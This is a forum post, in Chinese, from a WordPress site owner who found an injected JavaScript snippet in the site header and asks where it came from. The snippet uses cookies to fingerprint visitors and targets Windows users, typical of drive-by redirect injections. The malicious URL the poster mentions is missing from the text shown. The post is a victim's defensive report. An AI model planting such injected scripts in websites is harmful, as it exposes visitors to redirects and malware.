我有一个 WordPress 安装,它已成为网络钓鱼操作的主要目标。我以为我已经涵盖了大部分安全性,除了我在标题中发现了这个:
var a=document.cookie;document.cookie="hop="+escape("hop")+";path=/";var b=navigator.appVersion,c=" "+document.cookie,d=null,e=0,f=0;if(c.length>0){e=c.indexOf(" hop=");if(e!=-1){e+=5;f=c.indexOf(";",e);if(f==-1)f=c.length;d=unescape(c.substring(e,f))}} if(d=="hop"&&b.toLowerCase().indexOf("win")!=-1&&a.indexOf("hip")==-1){var g=["keg","kei","ken","kep","kev","kex","key","khi","kid","kif"],h=Math.floor(Math.random()*g.length);dt=new Date;dt.setTime(dt.getTime()+8E7);document.cookie="hip="+escape("hip")+";expires="+dt.toGMTString()+";path=/";document.write('</script>')};
最后的那个网址非常可疑。我用谷歌搜索但没有找到线索:-(
我还没有在我的 WP 安装中找到代码的来源。它没有写入模板文件或数据库。现在正在更新 WP 安装。
有没有人有这方面的知识?